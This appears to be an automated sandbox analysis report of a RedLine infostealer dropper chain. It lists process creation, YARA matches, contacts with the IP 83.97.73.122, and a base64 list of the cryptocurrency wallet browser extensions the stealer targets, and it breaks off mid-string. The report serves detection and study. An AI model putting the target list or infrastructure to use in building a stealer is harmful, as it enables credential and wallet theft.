                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: a4758283.exe, 00000003.00000002.361052449.00000000004DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 2.3.v6434086.exe.4c3f81e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.3.v6434086.exe.4c3f81e.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 6.0.b7687179.exe.e80000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A93BA20_2_00A93BA2
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A95C9E0_2_00A95C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00213BA21_2_00213BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00215C9E1_2_00215C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC3BA22_2_00BC3BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC5C9E2_2_00BC5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004068A03_2_004068A0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004051323_2_00405132
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004059DB3_2_004059DB
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004151A93_2_004151A9
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004062073_2_00406207
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040DBBF3_2_0040DBBF
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00414C653_2_00414C65
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00415DE53_2_00415DE5
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00405DE73_2_00405DE7
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004056073_2_00405607
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004156ED3_2_004156ED
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00416E913_2_00416E91
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeCode function: 6_2_017BF3886_2_017BF388
                            Source: qu0t4ukLoN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.3.v6434086.exe.4c3f81e.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.3.v6434086.exe.4c3f81e.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 6.0.b7687179.exe.e80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A91F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00211F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00211F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00BC1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: String function: 0040D294 appears 48 times
                            Source: qu0t4ukLoN.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 635732 bytes, 2 files, at 0x2c +A "v7020033.exe" +A "d4851931.exe", ID 1672, number 1, 24 datablocks, 0x1503 compression
                            Source: v7020033.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 310750 bytes, 2 files, at 0x2c +A "v6434086.exe" +A "c6803120.exe", ID 1676, number 1, 16 datablocks, 0x1503 compression
                            Source: v6434086.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 135234 bytes, 2 files, at 0x2c +A "a4758283.exe" +A "b7687179.exe", ID 1685, number 1, 11 datablocks, 0x1503 compression
                            Source: v6434086.exe.1.drStatic PE information: Resource name: RT_RCDATA type: x86 executable not stripped
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeiP5ufeu: vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeiP5ufeu: vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.logJump to behavior
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/8@0/1
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A93FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00A93FEF
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A94FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00A94FE0
                            Source: qu0t4ukLoN.exeReversingLabs: Detection: 52%
                            Source: qu0t4ukLoN.exeVirustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\qu0t4ukLoN.exe C:\Users\user\Desktop\qu0t4ukLoN.exe
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A91F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00211F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00211F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00BC1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00A9597D
                            Source: b7687179.exe, 00000006.00000002.426987259.0000000003690000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000437B000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000441D000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.00000000043CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: b7687179.exe.2.dr, SystemNetNetResA.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb